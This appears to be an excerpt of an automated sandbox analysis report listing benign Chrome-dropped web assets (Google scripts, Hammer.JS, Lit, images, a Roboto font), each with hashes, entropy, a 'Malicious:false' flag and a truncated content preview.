                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (589)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):383834
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.26257280052659
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:on+Si589iTKNYPitRo6IWJxFjYV9i1esjYE3bjHQoeRjVFmBFLKs:2WEJw7FLs
                                                                                                                                                                                                                                                                                          MD5:0C8FE2DFB7F074506C9A1114FAA763D7
                                                                                                                                                                                                                                                                                          SHA1:6D1B29C97D4E144E03F83284B7001C92A6523F78
                                                                                                                                                                                                                                                                                          SHA-256:0AAF712AB739F0A7BCE8FB2BEF58D609B7EACEBC514F35B61C2BEC77CC102A44
                                                                                                                                                                                                                                                                                          SHA-512:EA0D3E4381799B4FE4E5AF17FB30EEDA7B9380247CA5EF7B3216287814435E3ECFD2D3D9468CDFBDADDCC16F884BF2CA2B57077B332AC1A0EDADDF3E114E45AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.mdc=e():t.mdc=e()}(this,function(){return i={},r.m=n=[function(t,e,n){Object.defineProperty(e,"__esModule",{value:!0});var i=(Object.defineProperty(r,"cssClasses",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,"strings",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,."numbers",{get:function(){return{}},enumerable:!0,configurable:!0}),Object.defineProperty(r,"defaultAdapter",{get:function(){return{}},enumerable:!0,configurable:!0}),r.prototype.init=function(){},r.prototype.destroy=function(){},r);function r(t){void 0===t&&(t={}),this.adapter=t}e.MDCFoundation=i,e.default=i},function(t,e,n){var i=this&&this.__read||function(t,e){var n="function"==typeof Symbol&&t[Symbol.iterator];if(!n)return t;var i,r,o=n.call(t),s=[];try{for(;(void 0===e||0<e--)&&!(i=o
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2970
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.895994126557624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:LUxtKz7MmZV/8K1nIpFwPYYL5v2RLHjEleVn+i7gwOs8rm47mSVo8c:LU7KzJVv1naFcYYtv2dBF+i7gBmAmES
                                                                                                                                                                                                                                                                                          MD5:F61EE926FEE6EAC3A039BFC195647036
                                                                                                                                                                                                                                                                                          SHA1:1E695657BAF394E83B8EB8E452FF7B764D97520D
                                                                                                                                                                                                                                                                                          SHA-256:FF74857019BBF14A1E67353D312AEB78A450D403D7BCB6001C253E1769FAC8F6
                                                                                                                                                                                                                                                                                          SHA-512:C89A8FF456872058D4D6ACA881F25E4D994626801F9D15D8036B7A6BD14414CD395558736C83C1798D5B78CE004FE37EFC2347AD4F430295E9A7A327D62732F0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....aIDATx..{p\U..?..&.J....0....- h.G. ....i.Q..GK.V...N.6E)..Q.J.......:..##....S....).L..4.M.d_.?N...n....{n..g.....w>{.BJI..b.....4..8...N#......g?.|..m.b`).Y ^vm.....<.....72...C..h{...a....{.....g}...8...x.9.*.Y...9..h.......GYy1..-..,...<...`-.&p*..Q.^n..../..........<.x.8.......n`....uRo.a..1..Rb.p?.2p...=*.7...,Bu.v..\zF.'.....,.:.-...</P..X...@....zj...j....C....>.U.:........3T.."..j2..n.....)6..q.._..A...y.`.....x..hN..+dP....w.lO>0.............!.....y....L..h!.5......d...........?R.8X .a|br.....>......T...G&.X...nG..J.Zl...1.6T...Y...\........A...k..S..S..~.9|.2......Oi...\.Ua..%.C..........h.\.....dr..{....:2......6...5.....0.*..[M4..bx.o&...l........qy...FA....".Z.G.K\...~..).....Hk....K...;P.,..h....p,...>_......d.q&......{..Zl.....L...u.....k9"4.M2....>...D5.2-4.>3.dP..C..Bo)S..t..&.:..(...Ps-5.||.h.K\.............`.M.@.w..bd].Gu. `0.d.dLZdeh...............'...&.`\.H...x......pf..q..3u..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 700 x 495, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):265335
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9557490655143965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:XlMnLVGTYBBiPmfpx934HbpBTLHVr6K9Zy:XqLY8vYS34NBTMuY
                                                                                                                                                                                                                                                                                          MD5:F80AB9EBB64AF377C7F3E6109D4FDBC7
                                                                                                                                                                                                                                                                                          SHA1:9072DA126CAD59C0C96108E0853655E550A9A7B2
                                                                                                                                                                                                                                                                                          SHA-256:D0D1010DF5BAD1984249F2C1AC0D3231AC82541276A70D015BE5C0A94DDD557D
                                                                                                                                                                                                                                                                                          SHA-512:6D333899A5868CE83260E004C720E5ABFD91ACED2161869F266BA8A44944287827419EBA7AF86AC8E9E0B0BDD23ECB8482EACC02C0E52EFDE920CAA6AE5CCD91
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............9*.....9iCCPicc..H..W.XS...[......H..."R.H....^..!..J.. bG..\.X....(v@.E.....e],.Py....+..;......;s....Oq..lT...Q.$&.1.).A.........qyybVTT8.e..{y.. ....L....h..y<..(.S.y......W..|..2.|j.X.a.... ..e8].+e8U...m.b..7..B.r%...].<....5.z!v..".........!N....!..3S..I..f.&..>..s....a.8.;..L...9..A.V.R3$!1.9......a*.=..H.. .(...!F)..x.=j..c..]....0..!..eG.+..4a..b.B.Ba>'.b=.....c.6.%.1J_h]...R....._..G.x.R.M......2..!.@lQ L..X.b...0....v..D.#......(._....I.b...9y...6g.9.J| ?#.D........]..X.:..q.s.....s....X..Gq...b,N.gG).q3Av..7..%. V9.O..R.......q.E...(E<.2... .0...T..2.......)z...H@:...%38"Q.#..XP...H.....{...._.X.....{..#..3.s@...R.(.....2..x....f.*.... ..aA&\.H.=2..-....b.1.h...>.....~.:.L.cp......m....v....b.OQ...P?H....s.[AMW.....P..........p_....le..0~....~x.J;...%.#..m~..f..:."....Q.:.o.P....?d....-...A.<v........;.5`-.q..Z]O.k.[.<.,.#....'+.d.S.S...E_..P....\.4.0=#..._...#.9.`8;9.. ..(^_o....D..;7....O........`.;..G.s6L
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3664)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):296574
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4789881757349805
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                                                                                                                                                                                                                                                                          MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                                                                                                                                                                                                                                                                          SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                                                                                                                                                                                                                                                                          SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                                                                                                                                                                                                                                                                          SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/common.js
                                                                                                                                                                                                                                                                                          Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14341)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):284040
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.564082641223107
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:PyCax8eulzYeiTdG00ilXol0VQbQwM87NA0RsEemtJeN8ZzVn7L6IW8:PVphFGlq0Ud7bsEemve6375t
                                                                                                                                                                                                                                                                                          MD5:1D32E42E40495792EFFC64676B5AB569
                                                                                                                                                                                                                                                                                          SHA1:E285B14CE6378065A1560C2BA49F3D212FAF6D16
                                                                                                                                                                                                                                                                                          SHA-256:72E6A48A897D6CD84FDF752ECE90A1D3B830DB03404FBB746B7B2F8DA36DD386
                                                                                                                                                                                                                                                                                          SHA-512:0F99BC9A94889037734E747BF408BD2212F267E85DBB7131315F69DD171A9135D44B27502429414D4A9C4EFD1A7D7B037375EAB5DCB7060B597D9036A0F75925
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"18",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"PROTOCOL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":\/\/",["macro",2]]},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",5],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_ignoreCase":true,"vtp_defaultValue":"","vtp_map":["list",["map","key",".*(\u0026|\\?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7246)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16066
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.342160382206587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:QQx/Md02SvOiuEUqU0IYUncu4Kvc1BZWAuLVEzbaGS7D9ATPXrv:QQx/Mn4vuEUqU0IYUnD4KU1BZWAUa27g
                                                                                                                                                                                                                                                                                          MD5:444B4E1B4411D816BCBFA767A62D0B3F
                                                                                                                                                                                                                                                                                          SHA1:2AB36FBB8802349E6382D5E0CA25678EF28C914E
                                                                                                                                                                                                                                                                                          SHA-256:6140AE24B56866190868C56BA479658D0A4222ADE39F6D3FA7CBE556695A0465
                                                                                                                                                                                                                                                                                          SHA-512:F1634B12FC71688D6E82353A7E258CBC3D69026FCDD7493B5C3666F6D96ED77B415E1119A3A1FAB9C9CBF67C39B4906A1B672D6A31EBD64A1BE1ADE19E972D7A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2019 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const P=window,V=P.ShadowRoot&&(P.ShadyCSS===void 0||P.ShadyCSS.nativeShadow)&&"adoptedStyleSheets"in Document.prototype&&"replace"in CSSStyleSheet.prototype,W=Symbol(),q=new WeakMap;let it=class{constructor(t,e,s){if(this._$cssResult$=!0,s!==W)throw Error("CSSResult is not constructable. Use `unsafeCSS` or `css` instead.");this.cssText=t,this.t=e}get styleSheet(){let t=this.o;const e=this.t;if(V&&t===void 0){const s=e!==void 0&&e.length===1;s&&(t=q.get(e)),t===void 0&&((this.o=t=new CSSStyleSheet).replaceSync(this.cssText),s&&q.set(e,t))}return t}toString(){return this.cssText}};const dt=n=>new it(typeof n=="string"?n:n+"",void 0,W),Ct=(n,...t)=>{const e=n.length===1?n[0]:t.reduce((s,i,r)=>s+(o=>{if(o._$cssResult$===!0)return o.cssText;if(typeof o=="number")return o;throw Error("Value passed to 'css' function must be a 'css' function result: "+o+". Use 'unsafeCSS' to pass non-literal values, but t
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x810, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):53312
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.571619300895356
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:1cEYS024fNwJS0iIuRc21XeOPL++oz5Cr5kb6vzQ:ueSFF0iIk1XeODHooreb8M
                                                                                                                                                                                                                                                                                          MD5:7A848CF1B5D81C6E5240AC3F418C7C8D
                                                                                                                                                                                                                                                                                          SHA1:985C799F4E445DAFB8D3D4A6C880297CE90AB50C
                                                                                                                                                                                                                                                                                          SHA-256:0A65C954EFA353872007EAC4DD28AB7B68F669870B87F66284A8E5D0CA15A7D0
                                                                                                                                                                                                                                                                                          SHA-512:E64A9133C9AC4FB9820AB4AF181D6A7235958B2B1FF410A6D826E408A604B6CA4B8D2BFBE82E42982D39655CAF7551EFFE536BAAA211B2EF0329F0A83E026CE8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................*...."..........................................l..........................!1..AQ."aqu.....23RTst................#$%&46BSUVb..5r.......CFv....Ec...D...e..................................8.......................1.!Qa..Aq...."Rr...2B....3b.#S.............?..C......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18588
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.988601596032928
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:WF9srt3EJfKy7iOpqErJeqQhzsaZqPTPabcoqYdBTKYPvS9BlTf:Wn6UhKYieqAiPQTwclYQLlTf
                                                                                                                                                                                                                                                                                          MD5:115C2D84727B41DA5E9B4394887A8C40
                                                                                                                                                                                                                                                                                          SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                                                                                                                                                                                                                                                          SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                                                                                                                                                                                                                                                          SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (20581)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20765
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.294839791503179
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:mb5vj+l3jfaksTAAvNWUwLATFqACns+CSHDJDLrx:i5vj+5jfSTtrTFqACs+CSHtD5
                                                                                                                                                                                                                                                                                          MD5:15065981497259D972918A646AB771E0
                                                                                                                                                                                                                                                                                          SHA1:F2DE8453FCCB34BAF26D784AFA965DBE8C0D1550
                                                                                                                                                                                                                                                                                          SHA-256:8A1B58D624EEB47E9E3073531A5D364E41A2E7853C052873A79917F97DD0BB44
                                                                                                                                                                                                                                                                                          SHA-512:38CA7D35BEC8C1E2F3E17EEE4048E724F84B7C44EF001AF83E3CA68281A7E3E77E132283FF3597BFB0069B2B3B5C73BA9C9AFEFB12793EEC2F501D5F13E6D7ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*! Hammer.JS - v2.0.8 - 2016-04-23. * http://hammerjs.github.io/. *. * Copyright (c) 2016 Jorik Tangelder;. * Licensed under the MIT license */.!function(a,b,c,d){"use strict";function e(a,b,c){return setTimeout(j(a,c),b)}function f(a,b,c){return Array.isArray(a)?(g(a,c[b],c),!0):!1}function g(a,b,c){var e;if(a)if(a.forEach)a.forEach(b,c);else if(a.length!==d)for(e=0;e<a.length;)b.call(c,a[e],e,a),e++;else for(e in a)a.hasOwnProperty(e)&&b.call(c,a[e],e,a)}function h(b,c,d){var e="DEPRECATED METHOD: "+c+"\n"+d+" AT \n";return function(){var c=new Error("get-stack-trace"),d=c&&c.stack?c.stack.replace(/^[^\(]+?[\n$]/gm,"").replace(/^\s+at\s+/gm,"").replace(/^Object.<anonymous>\s*\(/gm,"{anonymous}()@"):"Unknown Stack Trace",f=a.console&&(a.console.warn||a.console.log);return f&&f.call(a.console,e,d),b.apply(this,arguments)}}function i(a,b,c){var d,e=b.prototype;d=a.prototype=Object.create(e),d.constructor=a,d._super=e,c&&la(d,c)}function j(a,b){return function(){return a.apply(b,argumen
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):659391
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.509533593186057
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:WUvI7MKQuoU7vJr/8nnr9i9rb7yEvRcRc6vR/RcPvRYRcYlGnLr9xc1C0R/IjR/W:9v0pQs7+
                                                                                                                                                                                                                                                                                          MD5:A9E4EEFEA555DE09A379F995F6FE0CFB
                                                                                                                                                                                                                                                                                          SHA1:910BEE7AE78A982A719DE3E9AC10D00F69A863C6
                                                                                                                                                                                                                                                                                          SHA-256:87431668C9EA056BB9F6A7A83CBA66C867B273FD8AFAE1BBEAF16D8952978749
                                                                                                                                                                                                                                                                                          SHA-512:5C0E176BC8C14D4E5A72327C40C4B96D2AF5B5CF8D102E9A0EFA10F1BA302A691ABDF77DBFD649D18D6932F8E5BA216F96E8C322154B13C7944D478BC7228296
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/images/animation/Template5050Accordion_Express_emojis_Desktop_Animation.json?fingerprint=a9e4eefea555de09a379f995f6fe0cfb
                                                                                                                                                                                                                                                                                          Preview:{"v":"4.8.0","meta":{"g":"LottieFiles AE 3.4.5","a":"","k":"","d":"","tc":""},"fr":25,"ip":0,"op":123,"w":860,"h":650,"nm":"Desktop - Gmail Product update - Emoji animation v03.2","ddd":0,"assets":[{"id":"image_0","w":326,"h":83,"u":"","p":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABTCAYAAADju65sAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAGKLSURBVHgB7b0JgGZFdS9+7vLtX+/dsy8wC8iwgyIBgQEHNSbkGaIY44YmbsS8mBijiTFCln8SfUbznkHF5D3zjyvEFRM3DCAKyj4DM8Aw+9Ld0/v27Xd5v1/dW1/f7/bXPdMz3WPy0gd6vnvrVp06dc6pU6dO1a0rsgRLsARLsARLsARLsARLMBcY8nMG3/cNgE9acK1+mc403uJX5dH5w3tVNLhV+aJl9HW9ikg94usKAxwSrVsji5BnxOrUeP3I8zr+GA2+pkHXHV430BXBX8cVZvYj7Z7RVp3eBO9cMvWP9zxKS7Tds9ApEbYZTepoWl+TdsTr1vcNfIjKT+eJ6U9dVvE6ZkuPPg8RNtMxfS3NyjZpU4Mea9ri9UhMrnH9jelKXD3julFnSLzuKD1ROmL8kkbVb2xHrE31emLti9YXJdiI8beeb67+Lz9HMOU0Qcg4I5ZmRH8jCq/B0IyLG4DbbrvNxJ8SCH/5/NZbbzVj9ak0/kUEb+DeiNOgaSPekBQjjiuqENFyuq+GRRrw6HzROnW5SP6o8qo2RdsS4pJoPWxz2BYzrMNgviivZrJT6uXjeWK0RI2g5kVDm1lX7F7jrpdvIk+JtyNKm5aTRuEHU
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.239822782008755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:mSnuZoS8/ZoSb9inY:mSnuZoS8/ZoSb9L
                                                                                                                                                                                                                                                                                          MD5:63886716D676B9D7DE02C6C9511EE2CD
                                                                                                                                                                                                                                                                                          SHA1:9BCB11CC6787DB339607600431651A0448A0D796
                                                                                                                                                                                                                                                                                          SHA-256:302C2126241DA806D8C3B3C3CF47FE8D3E0BA48333E74F8C9959CD99791796C6
                                                                                                                                                                                                                                                                                          SHA-512:755357A847DF2EAE1C869DBA5982EC8F90632B9C12850B3F45139C3109041C2395696585CE42F62A79DEFC2DD95538AB70D03F12F074FDD7A4F1277A2B5D24C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSHgkXmYpRzoPgIBIFDZFhlU4SBQ2RYZVOEgUNlJCS-g==?alt=proto
                                                                                                                                                                                                                                                                                          Preview:ChsKBw2RYZVOGgAKBw2RYZVOGgAKBw2UkJL6GgA=
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2418)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5220
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.318158347941208
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:gDLBsUNRvYojDvheMEFDicAG9VNsMAFDr40eyazFnl/b57xzQzZF02D3qoF+Xmzx:kuUNKQUMyPAqQveySlzBxzQzLxy2vnp
                                                                                                                                                                                                                                                                                          MD5:1486612FE72A069FF81D21F860E8FF2F
                                                                                                                                                                                                                                                                                          SHA1:C2ED68968FE325CE57CD71A78ADAC0EA5E0F6AE4
                                                                                                                                                                                                                                                                                          SHA-256:2F759806A3F416D3BC7D533F663ADC22156A1482CAB2383E8C8F29D23DD5713A
                                                                                                                                                                                                                                                                                          SHA-512:72339E9E5FC65E2311FE86DE630D7828F03BD9A398B441292946F0EFA8F9A11D88F3304274B7E2C697653CCF8C740E3C954A02EAFB6295AAA00EEDD1576DE4A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as h,s as u,x as o,A as x}from"./ycaG4YXp.min.js";import{e as c}from"./0XPwTFcg.min.js";import{n as r}from"./IYoTYjYE.min.js";import{e as b}from"./p9kcPq91.min.js";import{Y as v}from"./rwBjrn-0.min.js";const f=".container{position:relative;line-height:0;height:100%}.title{position:absolute;box-sizing:border-box;bottom:max(15%,42px);text-align:center;width:100%;color:#fff;padding:0 80px;z-index:10;text-overflow:ellipsis;display:-webkit-box;overflow:hidden;-webkit-box-orient:vertical;-webkit-line-clamp:2;font-family:Google Sans,Roboto,Noto,sans-serif;font-weight:400}@media (max-width: 767px){.title{font-size:20px;line-height:28px}}@media (min-width: 768px) and (max-width: 1023px){.title{font-size:24px;line-height:32px}}@media (min-width: 1024px){.title{font-size:28px;line-height:36px}}@media (min-width: 1024px) and (max-width: 1439px){.title{font-size:20px;line-height:28px}}@media (min-width: 768px) and (max-width: 1023px){.title{font-size:20px;line-height:28px}}@media (max-widt
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8005
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.932879807851235
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:NqJV3s0+3afbOkpJYFOFrxRA9nvpvAk/RH+h80d4D:ET3KSbpoOFNRw6k/Rehxs
                                                                                                                                                                                                                                                                                          MD5:82F73E47F29A0B0B6EA0AC8A67419E3F
                                                                                                                                                                                                                                                                                          SHA1:CAD2C14184D3EB8CBF94E98EE178362F9D494169
                                                                                                                                                                                                                                                                                          SHA-256:A51842A1727B816A7D5B2C8666EAF8EC5F6C00A60972812E3DB65ED315FDEE77
                                                                                                                                                                                                                                                                                          SHA-512:2D25A171AC3A8496035E38E4E823DF6CBD8CE1C1FC89B36F13EF3E46F5831E1AFAF1D796488BCD70C3DD1D0A489FE6752C01C62225CDD2A321BB53BBC33C83B6
                                                                                                                                                                                                                                                                                          Malicious:false
